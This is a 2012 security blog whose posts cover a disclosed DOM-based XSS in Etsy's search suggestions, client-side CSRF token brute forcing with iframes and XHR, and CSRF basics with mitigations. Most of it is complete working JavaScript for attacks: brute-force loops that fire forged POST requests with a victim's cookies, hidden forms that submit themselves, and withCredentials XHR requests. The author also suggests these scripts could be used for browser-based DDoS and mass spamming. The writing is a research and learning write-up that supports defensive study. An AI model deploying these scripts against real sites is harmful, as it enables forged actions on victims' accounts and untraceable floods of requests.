Friday, 14 December 2012

DOM Based XSS in Etsy

I recently found a DOM based XSS vulnerability in the Registry search function on Etsy and thought I'd do a quick write-up.

What is DOM based XSS?

DOM based XSS (in this article I'll abbreviate it to DBX) is slightly different to regular XSS in that we target the underlying Javascript used on the client-side instead of reflecting our attack off some server-side function. The end goal is however the same: typically the execution of malicious Javascript within the trusted domain of the target site.

Usually to find DBX vulnerabilities we need to trace the input and output of client-side Javascript functions and find data flows with poor (or non-existent) input validation. Manual code analysis is possible but it's far quicker and easier to use an automated tool such as Dominator.

Dominator is implemented using a modified version of Firefox and will dynamically test pages as you browse. It specifically looks for sources and sinks, essentially where input data goes in and where it comes out. For data flows that are potentially vulnerable Dominator will give you a warning and a step by step view of how exactly the data is being processed. It's then down to you to pick apart the output to figure out if it can actually be exploited or not.

You can get a free trial of Dominator Pro at the official site here:

Although there are multiple places where DBX vulnerabilities can appear, today I'm going to be looking at the handy little search box suggestion drop-down.

The humble suggestion function...

The search box suggestion menu is a staple function in most modern web sites. You enter some text in a search box and it gives you a set of suggestions back.

Me searching for a new dress on Etsy. (I ended up buying the hot pink dress ;) )

In the background there's a clever piece of Javascript running that detects when the input changes, dynamically processes the input and sends back suggestions. It's a useful function but does it validate my input?

Enter Dominator!

As mentioned before Dominator will break down the Javascript functions on the page and figure out where the sources and sinks are. Any time we can control a potentially sensitive sink Dominator will produce an alert and show us how our data is being processed.

How can we use this information to exploit a search field? Rather conveniently Stefano (the creator of Dominator) produced a handy tutorial here:

With Stefano's suggestions in mind I took a look at Etsy and came across the Registry suggestion field here:

This field insecurely used the search input and was vulnerable to DBX. I forgot to take a picture of the *actual* vulnerable code but here is equivalent code that is used for the main Etsy search function. Check it out:

Dominator tells us how our input data is manipulated as it passes through the javascript in the background. I started off by typing 'abc' in the search box and as you can see a replace function removed carriage returns, the input was made lowercase then concatenated with other strings and added to the page.

What's missing? Input validation! According to this input processing path, not once are special characters removed or replaced.
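To make that concrete, here's a rough sketch of that processing path. This is my own reconstruction for illustration — the function name and markup template are assumptions, not Etsy's actual code:

```javascript
// Hypothetical reconstruction of the suggestion-building path Dominator showed.
// buildSuggestion and the markup template are illustrative, not Etsy's code.
function buildSuggestion(query) {
  var cleaned = query.replace(/\r/g, '') // carriage returns removed
                     .toLowerCase();     // input made lowercase
  // No escaping of <, >, " or ' - special characters flow straight into markup
  return '<li data-value="' + cleaned + '"><span>' + cleaned + '</span></li>';
}
```

A benign query like 'abc' produces harmless markup, but angle brackets and quotes survive the replace/lowercase steps untouched.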

How can we exploit this?

Ideally we'd like to insert some malicious javascript in the page. How about inserting a sneaky iframe containing javascript?


Simply inserting this code into the search box won't work as the output is still inside various quotation marks and HTML tags. Looking down the screenshot above, the bottom part shows the finished HTML that will be written to the page. In this code you'll notice two possible injection points: the first is between the span tags, the second is in the list item's data-value attribute.

The first injection point actually had some additional checks but the second injection point didn't. So to exploit we just close off the quote for the data-value, close off the list tag and then insert our iframe.
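As a mock-up of the breakout (my own illustration — the template and payload are approximations, not the exact strings involved):

```javascript
// Illustrative only: a payload that closes the data-value quote and the
// list tag, leaving the iframe outside any attribute or element.
var payload = 'x"></li><iframe src="javascript:alert(1)">';
var html = '<li data-value="' + payload + '"><span>x</span></li>';
// html now contains:
// <li data-value="x"></li><iframe src="javascript:alert(1)">"><span>x</span></li>
// The iframe is live markup once written to the page.
```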


Entering this query into the search box would successfully lead to exploitation.  

Although I didn't review the code, I believe the main search box isn't vulnerable because of two mitigations. The first is that if your query contains special characters such as slashes, quotes or brackets, the search box falls back to the default text "find shop names containing", which prevents usage of the suggestion function. The second mitigation involves a maximum length on the suggestion: if your input is too long you will no longer be given suggestions.
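A sketch of how those two mitigations might look in code. The blocked-character list and the length cap value are assumptions based on the behaviour described, not Etsy's implementation:

```javascript
// Illustrative reconstruction of the two mitigations described above.
// The blocked-character set and the cap value are assumed.
var MAX_QUERY_LENGTH = 40;

function allowSuggestions(query) {
  // Mitigation 1: special characters trigger the fallback text instead
  if (/[\/\\"'<>()\[\]]/.test(query)) return false;
  // Mitigation 2: overly long input gets no suggestions
  if (query.length > MAX_QUERY_LENGTH) return false;
  return true;
}
```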

Final Thoughts

This vulnerability yet again demonstrates the importance of using proper input validation for ALL inputs. Even in 2012 (almost 2013!) developers are still missing the basics it seems.

DBX is an interesting attack vector that's not as well known or researched as regular XSS partly due to the difficulty of dynamically analysing Javascript. Dominator has really filled a gap in the market providing both attackers and defenders with a way to detect potential DBX vulnerabilities. Props to Stefano for making such an awesome tool.

Lastly I want to give a shout out to Etsy for a quick response/fix as well as the bounty!


The PwnDizzler

Tuesday, 4 December 2012

CSRF Token Brute Force Using XHR

In my last post I mentioned I had been working on a client-side XHR based CSRF token brute forcer. In this post I'm going to talk in-depth about the script I've developed, how it performs compared to other techniques and the limitations I encountered.

Previously I covered the basics of CSRF and demo'ed two iframe based brute force scripts. The posts can be found here:

And here:

CSRF token brute forcing: IFRAME vs XHR

Having already introduced client-side CSRF token brute forcing in my previous post I'm going to jump straight into how techniques using iframes and XHR compare with each other.

Fundamentally, iframes and XHR are completely different things. Iframes provide a way to embed content in a page. In the previous examples, however, we used them as a way to send hundreds of arbitrary requests to a third party without leaving the current page. Although iframes can do this, they were never optimised for it.

XMLHttpRequest on the other hand was created as a way to send/receive arbitrary data. The granularity offered by XHR allows greater control of the connection and greater efficiency when it comes to brute forcing.

Doesn't Same Origin Policy prevent Cross-Domain Requests?

I meant to cover this in the previous post but didn't have time. The short answer is no.

Iframes by design are allowed to load cross domain content but browsers prevent cross domain interaction between the page and the iframe. It is still possible to send a request through an iframe (for CSRF), we just can't see the response.

One of the most interesting attacks involving iframes is click-jacking, where we embed a legitimate site within a malicious page we control and trick the user into interacting with the embedded page. Wikipedia:

Most large sites now implement the X-Frame-Options header to prevent framing of content. If a server responds with the X-Frame-Options header set to DENY, the browser will not render the content. Let's compare the response headers of Facebook and Amazon:

Facebook homepage, notice the X-Frame-Options header.

Amazon homepage, no X-Frame-Options header!

As you can see below the Amazon main page is open to click jacking.
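The browser-side check can be sketched roughly as follows. This is a simplification — it ignores the ALLOW-FROM directive and per-browser quirks:

```javascript
// Simplified model of how a browser decides whether to render a framed page.
function framingBlocked(xfoHeader, framedOrigin, topOrigin) {
  if (!xfoHeader) return false;            // no header: framing allowed (Amazon)
  var value = xfoHeader.trim().toUpperCase();
  if (value === 'DENY') return true;       // never render in a frame (Facebook)
  if (value === 'SAMEORIGIN') return framedOrigin !== topOrigin;
  return false;                            // unrecognised values are ignored
}
```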

Anyhow, I'm getting a bit off topic, back to XHR! XHR, like any other browser request, is subject to the usual restrictions: by default cross domain requests can be sent but the responses can never be read. There are some exceptions of course, such as scripts, CSS, images and CORS.

For CSRF though, the important point is that browsers allow you to send cross domain requests. You can't see the responses, but in a CSRF attack you don't care about responses!

For more information on XHR it's worth checking out:

Let's build a brute forcer!

Following on from my previous work I decided to write a XHR-based CSRF token brute forcer to see if I could speed up the brute force process. I had a search around on Google and couldn't find a CSRF token brute force script that used XHR, so I decided to write my own.

1. XHR Code

I started off with some basic XHR code. Shreeraj Shah covers a simple XHR CSRF example here:

var xhr = new XMLHttpRequest();
var url = '';
xhr.open('POST', url, true);
xhr.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var datas = 'name=a&phone=b';
xhr.send(datas);

It's pretty self explanatory, we create our XHR connection object, set basic request parameters with open, define extra headers, create the data string we want to send and send it.

Shreeraj's example includes the withCredentials property to ensure our request is sent with the user's cookies, and he also sets the content-type to plain text. The site I was testing against required a content-type of "application/x-www-form-urlencoded" and didn't enforce preflight checks, so I changed this parameter.

2. Iteration To Send Multiple Requests

Just like the previous brute forcers, I found setInterval and setTimeout to be the quickest way to send and control XHR. I configured setInterval to repeatedly call a function containing the XHR connection code. setTimeout stops setInterval after a specified time period and outputs the finished message to the screen.

I used a set of global variables to maintain the current state of the attack, each new request would use the current values and increment them. I did try using a FOR loop to spam requests but I found Chrome throttled the requests to one per second.

var task = setInterval("openXHR();", 1);

setTimeout("clearInterval(task);document.getElementById('done').innerText ='Finished'", 1000); 

I created some funky incrementing code to allow iteration through number or letter arrays and also to allow arbitrary positioning of variables. No doubt this can be cleaned up a bit.
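The core of that incrementing code is just an odometer over an arbitrary character set. Here's a cleaned-up standalone version of the idea (my own refactor, not the exact code from the script):

```javascript
// Odometer-style increment over an arbitrary character set.
// 'digits' holds indices into 'charset', least significant position last.
function nextToken(digits, charset) {
  for (var pos = digits.length - 1; pos >= 0; pos--) {
    if (digits[pos] < charset.length - 1) {
      digits[pos]++;
      return digits.map(function (d) { return charset[d]; }).join('');
    }
    digits[pos] = 0; // carry into the next position
  }
  return null; // wrapped around - every token has been tried
}

var numberSet = ['0','1','2','3','4','5','6','7','8','9'];
var state = [0, 0, 9];                  // current token "009"
var next = nextToken(state, numberSet); // "010"
```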

3. Maximizing Throughput: A Balancing Act

I played around quite a bit with different ways to increase the throughput. This was a careful balancing act between the number of connections, the number of requests being sent to the connections and how fast connections could be established and pulled down.

  • Multiple XHR Objects
The first idea I had to increase throughput was using multiple XHR objects. Browsers usually allow 6 concurrent connections to the same site, so why not create 6 XHR objects to work in parallel? Multiple connections working in parallel means more requests per second, right? Kinda.

I discovered Chrome would reuse the same connection for sending multiple requests provided you gave it enough time for each request to receive a response. If you force requests down the connection faster than responses come back, Chrome opens new connections. So it turns out you don't really need multiple objects; with a single XHR object Chrome automatically runs at maximum speed.

Using an interval of 50ms Chrome will use a single connection (src port)

With an interval of 10ms Chrome opens a new connection for each request

(For attacking sites locally multiple XHR objects will give you a speed increase as responses are received a lot quicker. However when you try this with a remote site the latency causes requests to start backing up and this technique no longer works.)

  • Aborting connections after the request
Requests were typically taking 10ms to establish a connection, 1ms to send data and 10ms to wait for the confirmation ACK. To prevent the browser waiting for a response I tried using the abort method. My aim was to close the connection as soon as the request was sent as this would free up one of the browser's concurrent connection slots.

Typical timings for a request (see Time column)

I tested this by performing xhr.send followed by a call to a wait function, then xhr.abort. This technique worked but was not as fast as I had hoped and capped out around 40 requests per second.

Using the abort method we send a FIN after our request is sent

As you can see from the packet capture, the abort method sends a FIN to gracefully close the connection and the connection stays open waiting for a FIN ACK. Compared to our initial run it's no faster. Ideally we want to close the connection as quickly as possible, so we'd rather send an RST packet, but I couldn't find a way to do this :(

  • Keeping it simple?!?
Often the simplest solution is the best solution so I tried using a single XHR object and just sending requests as fast as possible using setInterval with a 1 millisecond wait. Interestingly this produced the highest throughput, around 60 requests per second.

Spamming requests!

The catch with this technique is that it's unreliable. You will often lose requests as you're trying to send data when no connection slot is free. Using an interval of just 1 millisecond I sometimes saw losses of up to 75%. The interval can be adjusted according to how reliable you need the attack to be.

4. The Finished Product

Putting everything together here's the final code for the brute forcer:

<div id="a">Sending request: <output id="result"></output></br>
<div>NOTE: Browser requests sent != Actual requests sent (Check wireshark)</div>
<output id="done"></output></div>

//Create XHR objects
var xhr1 = new XMLHttpRequest();
var xhr2 = new XMLHttpRequest();

//Global variables
var url = '';
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");
var alphabet = new Array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var i=0;
var j=0;
var k=0;
var l=0;
var m=0;

//Simple wait function
function tea_break(msec) { 
 var date = new Date(); 
 var curDate = null; 
 do { curDate = new Date(); } 
 while(curDate - date < msec); }

//Function to send a request using current parameters
function openXHR(){
 xhr1.open('POST', url, true);
 xhr1.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
 xhr1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 var data1 = 'name=a&phone=b&email=c&csrf=' + numbers[j] + numbers[k] + numbers[l] + numbers[m];
 xhr1.send(data1);
 //***Optional wait and abort
 //tea_break(10); xhr1.abort();
 //Screen output
 document.getElementById('result').innerText = "" + j + k + l + m;
 //***Optional second XHR object
 //xhr2.open('POST', url, true);
 //xhr2.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
 //xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 //var data2 = 'name=a&phone=b&email=c&csrf=' + numbers[j] + numbers[k] + numbers[l] + numbers[m];
 //xhr2.send(data2);

 //Increment token - will need to change limits/logic for alphabet set
 if(m!=9){
  m++;
 } else{
  //Tick over to 0 at end of set
  m=0;
  if(l!=9){
   l++;
  } else{
   l=0;
   if(k!=9){
    k++;
   } else{
    k=0;
    if(j!=9){
     j++;
    } else{
     j=0;
    }
   }
  }
 }
}

//Speed at which requests are sent
var task = setInterval("openXHR();", 1);
//Stop sending after x milliseconds
setTimeout("clearInterval(task);document.getElementById('done').innerText ='Finished'", 1000); 



Show me some benchmarks!

For this set of testing I relied on Wireshark to get a definitive answer of what packets were actually being sent. Chrome (and likely other browsers) show requests taking place in the developer tools but in reality only a limited number actually complete successfully.

Wired vs wireless had a big impact so I performed all tests plugged in via ethernet. Responses were typically 10ms for wired and 30ms for wireless.

I've also included revised results from my previous tests using IFrames. Results show the maximum number of requests per second.

                     Chrome 22   IE9     FF16
Multi-IFrame  Local      29       25      14
              Remote      7        8       7
Single IFrame Local      60       79      10
              Remote     50        1      10
XHR           Local     110     Error     70
              Remote     55     Error     65

Python        Remote    300
BlackMamba    Remote   3000?

The good news is that the XHR method is faster than the other techniques especially for local attacks. The bad news is that XHR is only marginally faster and is still too slow to crack most CSRF tokens in use today.

The same limitations I discussed in the previous post still apply, with latency and concurrent connection limits having the biggest impact on throughput. Traditional CSRF prevention techniques such as complex tokens or Referrer/Origin checking also prevent this type of CSRF attack.

I've included some numbers for a direct brute force attack using python. At BlackHat this year Dan Kaminsky mentioned BlackMamba which is a concurrent networking library for Python. Using this library he was able to scan 3000 addresses per second. Sweet!

Final Thoughts

So we have a brute forcer, what now? Find a page with a weak token, build a malicious page, trick users into visiting your page and enjoy the CSRF, right? ;)

After working on the iframe based brute forcers and the XHR version I feel a little disappointed I couldn't push the requests per second into the hundreds or thousands. For most sites token entropy isn't that bad, and realistically you'd need to send a minimum of 1,000 to 100,000 requests per second for an attack to succeed given the short time frame offered by a drive-by style attack. Unfortunately it's just not feasible to send that many requests with current technology.

Whilst the main focus of my work has been brute forcing CSRF tokens, the scripts I've been demonstrating essentially provide a client-side mechanism for sending thousands of POST requests. Such a mechanism could be used for all kinds of mischief; browser based DDoS and mass spamming spring to mind.

Probably the best thing about these attacks is that all requests would come from unsuspecting users who just happen to run your javascript. The only evidence of the true origin of the attack would be the referrer header of requests and if the malicious javascript was hosted on a legitimate site there would be no way to trace the true origin at all.

I hope you guys have found this interesting, any comments, questions or corrections just leave a message below. Also if anyone can suggest any alternatives to iframes or XHR please let me know! :)


Pwndizzle out

Saturday, 24 November 2012

Client-side CSRF Token Brute Forcing

While playing around with some CSRF examples the idea of client-side CSRF token brute forcing came into my head. I'd never heard of this type of attack before and did some Googling. I was interested to see that although the attack was known about there was very little in terms of proof of concept code or in-depth research. I decided to dig further into this area and play with a few examples.

Note: This is the second part of a journey into CSRF. To learn more about the basics of CSRF please check out my previous post here:

The idea: create a page containing malicious Javascript; when someone visits the page the Javascript runs, forcing the user to send requests that brute force their own CSRF token on a remote site. Win!

Stuff you'll need

To actually play with the examples below you'll need:
  • A web server running on your machine - Apache on Linux or Xampp (which contains Apache) on Windows.
  • Code editor. I use Notepad++ but there's also the classics vim, gedit, emacs :)
  • Debugging tools. Browser developer tools - Chrome (right click inspect element), IE (press F12) and Firefox (Firebug or HttpFox). Or you could use Burp or Zap (although they can slow things down). Also Wireshark is handy for more low level investigation.
  • A CSRF example to actually attack. I used Debasish Mandal's simple CSRF example here:

What is client-side CSRF token brute forcing?

CSRF prevention often involves the use of a unique token to prevent the attacker from crafting a valid request ahead of time. While the attacker may not be able to directly access this token, they may be able to just guess or brute force the token instead.

Client-side CSRF brute forcing uses the same concept as traditional token brute forcing i.e. iterating through possible token values until we find a valid token, but combined with CSRF. So instead of sending requests from our attacking machine to the remote server with our cookie, we get the target user to send multiple requests to the remote server with their cookie. Eventually they will guess the correct token and the malicious request will be accepted by the server.
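In other words, the malicious page just walks the token keyspace. A minimal sketch of the enumeration (the names are mine; in a real attack each token would go out in a forged request rather than into an array):

```javascript
// Enumerate every possible token of the given length over a charset.
function allTokens(charset, length) {
  var tokens = [''];
  for (var i = 0; i < length; i++) {
    var next = [];
    tokens.forEach(function (t) {
      charset.forEach(function (c) { next.push(t + c); });
    });
    tokens = next;
  }
  return tokens;
}

allTokens(['0','1'], 2); // ["00", "01", "10", "11"]
```

Building the whole list in memory is only sensible for tiny keyspaces; a practical brute forcer increments one token at a time instead.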

In a typical brute force attack we'd want to send requests and monitor the responses for an indicator that the attack succeeded. However in a CSRF brute force attack we never receive or even want to receive responses. A subtle point but worth bearing in mind as it can speed up the brute forcing process.

Also note that for this attack to succeed the remote site must be using a weak CSRF token (otherwise it will take too long to brute force) and the target user must be able to run javascript.

Surely someone's done this before?

I checked Google for previous research but couldn't find much. There were lots of articles about the CSS history hack that was around a few years ago (Nice attack but sadly it doesn't work in modern browsers). Also there was a talk from BlackHat 2009 where the guys obtained access to CSRF tokens by taking advantage of information leakage:

Again, cool attack, but not what I was looking for. After some more digging I came across two decent posts, one written by Debasish Mandal on his awesome blog and another by Tyler Borland:

Both guys present proof of concept CSRF brute forcers that use iframes to send multiple CSRF post requests with different tokens. Although both are great scripts, neither was optimised for speed or for handling thousands of requests. I used both scripts as a starting point for building my brute forcers and modified them to increase their functionality, simplify the code and speed them up.

When running these scripts the developer tools might show errors like "request aborted" or "canceled", these can often be ignored as the requests are actually still being sent. Burp or Wireshark can be used to verify what is actually being sent/received.

Bring on the Javascript!
Example #1

Debasish's script focused on creating a set of iframes that each contained a post request; each iframe would tackle a different CSRF token. Debasish used two files, one for the generation script and one for the post form, which increased the volume of code but also the execution time. I combined the two.

<div id="a">Launching brute csrf...</div>

//Character sets to use
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");

//Iterate through list
//May need extra for loops for additional character sets
for (var j = 0 ;j<=9;j++)
 for (var i = 0 ;i<=9;i++)
 //Create frame
 frame = document.createElement('iframe');

 //Add post form and javascript to frame
 //Add/remove character sets and positions where appropriate
 frame.contentWindow.document.write('\<script\>function fireform(){document.getElementById("csrf").submit();}\</script\>\<body onload="fireform()"\>\<form id="csrf" method="post" action=""\>\<input name="name" value="bill"\>\<input name="phone" value="123456"\>\<input name="email" value=""\>\<input name="csrf" value="' + numbers[j] + numbers[i] + '"\>\<input type="submit"\>\</body\>');

My version is a bit faster and more compact, making it easier to test/modify. The biggest issue with this script is that it doesn't scale as each request has its own iframe. When brute forcing we're going to need to send potentially thousands of requests, and creating, adding and loading thousands of iframes just isn't practical.

Using setInterval() it would be possible to process iframes in batches but overall this technique is just not as efficient as Tyler's technique below.

Example #2

Tyler Borland's script was originally designed for denial of service through account lock-outs but I've modified it for brute force. The concept is quite simple: there's a post form that contains a token value; this value is repeatedly incremented and submitted to an iframe. Usually when you post data with a form, the page navigates to the response from the server. By sending our post request to the iframe, the iframe loads the response and the user remains on our malicious page, allowing the attack to continue! The important attribute here is "target", which redirects our post request to the iframe.

Tyler originally used the iframe onload function to automatically send the next request once the current request had completed. Whilst this is a clean and effective technique it's not the fastest. For some reason I was getting a 500ms delay before any response packet was received. I couldn't find the cause of the delay but by removing the onload and implementing a threaded approach with setInterval I was able to send requests at a faster rate. I also added some simple brute force logic, character sets and basic output.

<!DOCTYPE html>

<!--Info on progress so far-->
<div id="a">Sending request: <output id="result"></output></div>

<!--Form that will be submitted-->
<form id="myform" action="/ww/submit.php" target="my-iframe" method="post">
  <input name="name" type="hidden" value="hacked">
  <input name="phone" type="hidden" value="hacked">
  <input name="email" type="hidden" value="hacked">
  <input id="tok" name="csrf" type="hidden" value="">
  <input type="submit">
</form>

<script type="text/javascript">

var alphabetupper = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
var alphabetlower = new Array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var alphabetcombo = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");
var allcombo = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9");

var i=0;
var j=0;
var k=0;
var l=0;
var m=0;
var t1 = new Date();

//OPTION #1 - Without onload
//Function to submit the form once, this is repeatedly called
function submit1(){
 //Assign token value. Can switch numbers array for alphabet array depending on token.
 document.getElementById('tok').value = "" + numbers[k] + numbers[l] + numbers[m];
 //Submit form
 document.getElementById('myform').submit();
 //Show token on page
 document.getElementById('result').innerText = "" + i + j + k + l + m;
 //Increment token, reset to 0 when we reach 9 e.g. 009 to 010
 //For alphabet array 9 needs to be switched for 25
 if(m!=9){
  m++;
 } else{
  //Tick over at end of set 9 to 0.
  m=0;
  if(l!=9){
   l++;
  } else{
   //Tick over at end of set 9 to 0.
   l=0;
   if(k!=9){
    k++;
   } else{
    k=0;
   }
  }
 }
}

//Submit form every <x> milliseconds
var task = setInterval("submit1()",10);
//After <x> milliseconds has passed stop submitting form
setTimeout("clearInterval(task);alert('Requests sent: ' + k + l + m);", 10000);

//OPTION #2 - Using onload
//If you want to use iframe with onload, comment out above two lines and uncomment below:
//function submit2(){
// if(k==9 && l==9 && m==9){
//  var t2=new Date();
//  alert('Finished in ' + (t2-t1)/1000 + ' seconds');
// } else{
//  submit1();
// }
//}

</script>

<!--OPTION #1 - no onload-->
<iframe id="my-iframe" name="my-iframe"></iframe>
<!--OPTION #2 - using onload-->
<!--<iframe id="my-iframe" name="my-iframe" src="/ww/submit.php" onload="submit2()"></iframe>-->
<!--In Chrome if x-frame-options is set to Deny, the page won't load and onload won't trigger!-->


The brute force logic relies on setInterval, setTimeout and global variables as I couldn't get FOR loops to work. I believe this relates to the way the DOM loads content. You essentially need to execute javascript, allow the page to load, then run some more javascript, allow page to load and repeat. I'll stop now as real life web developers are probably cringing at this point, haha, hey I'm no javascript expert!

When testing this code the important parameters are the rate at which requests are sent, controlled by setInterval, and the total run time, which is controlled by setTimeout. Times are in milliseconds so for example 1000 milliseconds = 1 second. Also you will need to change the form's "action" parameter to the page you want to attack.

Example #3 (the mystery prize!)

I've also been working on my own brute force script that uses XHR which I'm going to talk about in a subsequent post, so stay tuned!

What's the performance like?

I tested my modified scripts against Debasish's vulnerable page and also a remote site on the net. For each run I calculated the maximum number of requests it was possible to send per second. The results are meant only as a rough guide, as the brute force speed is heavily dependent on the exact code used and a number of external factors.

Edit: Some of these numbers may be a little off as I discovered Chrome/IE were lying to me :) To get accurate numbers I'd recommend checking what packets are actually being sent with Wireshark.

                Chrome 22   IE9   FF16
Debasish Local      29       25    14
         Remote      7        8     7
Tyler    Local      60       79    10
         Remote     30       30     1

Debasish vs Tyler

The first thing you'll notice is that Tyler's script is a lot faster. Debasish's script spends too much time creating and adding all of the iframes to the DOM and then suddenly tries to load them all creating a bottleneck. Tyler's script however sequentially executes requests one by one making it more CPU/memory/network efficient.

Local vs Remote

The second thing you'll probably notice is that remote requests are a lot slower than local requests. While this is to be expected, it's important to emphasize just how much of an issue this is for brute forcing. Forget about fancy protections; latency is the single biggest issue when it comes to online brute force attacks. In most cases it will simply take too long to establish connections for the hundreds, thousands or millions of requests needed, making brute force unfeasible. Much like latency, the cap on concurrent connections also severely limits throughput. All browsers implement a cap and there is no way around it.

For example, when trying to brute force a relatively small five character token consisting of lowercase and uppercase letters and numbers, the search space consists of 62^5 ≈ 916 million possible combinations. Performing 10 requests a second, it would take nearly three years to try every combination, uh oh!
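The arithmetic is easy to sanity-check:

```javascript
// Sanity-check the search space and attack duration quoted above.
var combinations = Math.pow(62, 5);     // 916,132,832 - roughly 916 million
var perSecond = 10;
var seconds = combinations / perSecond;
var years = seconds / (60 * 60 * 24 * 365);
// years works out to about 2.9 - "nearly three years"
```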

Chrome vs IE vs Firefox

The last thing I'll mention is browser differences. Firefox seemed to use some kind of throttling (not sure if this was intentional or just a technical limitation) to prevent the browser from rapidly sending requests. Often requests would be dropped with no explanation.

Chrome and IE both performed really well. I found this surprising as I assumed Chrome would whoop IE but it looks like Microsoft have done a good job with IE9. Averaging 1 request every 17ms ain't easy! For more information on the differences between browsers it's worth checking out:

Hey! What about scaling?

I only did a few quick tests with Tyler's script but it seemed to scale pretty well. As mentioned already Debasish's script will need a re-write to scale properly. Also be aware that when sending a large number of requests you will blow up the developer tools, so disable them!

Are there any limitations?

Yes, quite a few.

Client-side limitations
  • Browser has a max number of concurrent connections
  • User must allow Javascript execution
  • Browser's built in CSRF protections
  • Processing speed of browser
  • Memory of browser

Server-side limitations
  • Latency between browser and web server
  • CSRF protection mechanisms e.g. Referrer/Origin checking
  • Server processing speed
  • Application layer or network layer lock-outs
  • Max number of concurrent connections for your ip
  • ISP may block large number of requests

Quite an ominous-looking list. Interestingly though, the scripts I've covered in this post will still work against weak tokens on sites that don't implement lock-outs or origin checking.

Possible improvements and the future?

I know I said latency was the biggest issue, but if you take a step back you realise it's current CSRF techniques that are the real problem: fundamentally you are limited to the browser and to using javascript.

With that said there is more work that I think can be done with client-side CSRF brute forcing. I had only a limited amount of time to research, develop and test everything and I'm not even a web developer! :) I'd be really interested to see what other folks could do if they carried on developing this code.

Threading was not something I really discussed in this post, but the setInterval method and web workers offer a lot of possibilities. Low-level efficiency is also really important: opening and closing connections is inefficient, as is waiting for replies. If you could open one connection, pipe data over it and not wait for responses, you'd have a great candidate for a brute forcer.
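As a sketch of how workers could split the job (my own illustration, not code from this post; the charset, token length and slicing scheme are all assumptions), each worker can walk a disjoint slice of the keyspace by mapping integers to candidate tokens:

```javascript
// Map an integer index to a candidate token, so that worker k of N can
// independently try indices k, k+N, k+2N, ... with no coordination needed.
const CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

function indexToToken(index, length) {
  let token = "";
  for (let i = 0; i < length; i++) {
    token = CHARSET[index % CHARSET.length] + token;
    index = Math.floor(index / CHARSET.length);
  }
  return token;
}

console.log(indexToToken(0, 5));  // "aaaaa"
console.log(indexToToken(1, 5));  // "aaaab"
console.log(indexToToken(62, 5)); // "aaaba"
```

Each web worker (or setInterval loop) would then only need its worker number and the total worker count to know exactly which candidates to send.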

Using a perl/python/c/java/ruby script you have a lot more flexibility. Unfortunately, for CSRF to succeed the request must be performed client-side, which usually means other languages can't be used. Or can they? :)

As usual I want to finish this post by saying I'm no expert on CSRF or browser internals, so I have likely missed the obvious or done things completely back to front! I enjoy playing around with code and for me it's a great learning experience that I want to share with others. If anyone has any ideas, corrections or comments feel free to drop me a comment below.



Thursday, 15 November 2012

Back to Basics: CSRF

I've recently been playing with client-side CSRF token brute forcing. It's cool stuff, but for folks who aren't so hot on CSRF (or just need a refresher!) I thought I'd do a quick CSRF back-to-basics. As CSRF has been talked about a lot before, I'm going to try and keep it brief, covering some simple attacks and mitigations.

For a basic introduction the best place to start is OWASP:

In a nutshell, we are tricking a user into sending our malicious request to a remote server using their already-established session. This is usually possible because the structure and contents of a vulnerable request are known ahead of time, and it's just a matter of creating the request and convincing a user to send it. Awesome, so we can perform actions as another user? Yep!

How do you actually launch a CSRF attack?

If the target site has a vulnerable page that is accessed using a GET request, all we need to do is create a webpage or email containing either a malicious link or image and trick the user into accessing it. The user will run the code and unknowingly send a malicious request to a third party site. From OWASP:

<a href="">View my Pictures!</a>


<img src="" width="1" height="1" border="0">

For a vulnerable page that uses a POST request we can create a webpage with a form and some javascript to auto-submit it. When the user visits the page it will submit the request using their session cookie. The form "action" should link to the target site and the parameters should be identical to a legitimate request. 

    <form action="" method="post" name="badform">
        <input name="accountId" type="hidden" value="1234" />
        <input name="amount" type="hidden" value="1000" />
    </form>
    <script type="text/javascript">
        document.badform.submit();
    </script>

The above examples can also be created using jquery or pure XHR, for example:

function xhrcsrf(){
    var http = new XMLHttpRequest();"POST", "", true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.withCredentials = true;
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            // request completed successfully
        }
    };
    http.send("accountId=1234&amount=1000");
}
To test these examples you probably want to install xampp on Windows or apache on Linux. And for a vulnerable page I used Debasish's simple profile.php and submit.php script here:

How to protect against CSRF?

CSRF relies on the static nature of requests and the ability to send cross domain requests. By making requests unique and checking where they originate from you can easily prevent CSRF.

To make requests unique commonly a random value, or token, is included as a parameter. An attacker will not know this value ahead of time and will be unable to craft a static malicious page that can send a valid request.

For example a unique token could be generated server-side using the current time, a secret key value and a complex math function. This value is returned when the user loads a page on a site and is submitted with all requests back to the server. Assuming everything else is secure, there is no way for the attacker to know this token without knowing the underlying token generation algorithm.

Below is a status update to Facebook. I've circled the token they use to prevent CSRF.

The other protection mechanism I mentioned was sender verification. To verify the source of the request, the receiving page can inspect the Referer or Origin header. A simple check would verify that the request came from your legitimate domain and not from another site (cross-domain).

There's a great article about CSRF protections that is far more in-depth here:

How to get around CSRF protections?

This is where things get a bit tricky. If a site is checking the Origin or Referer header of your requests you're stuck. Browsers set these headers, and unless you can modify the traffic leaving the browser (malicious extension?) or on the wire (MITM), there is no way to tackle this.

EDIT: I was actually wrong about this. Kotowicz has some work arounds here:

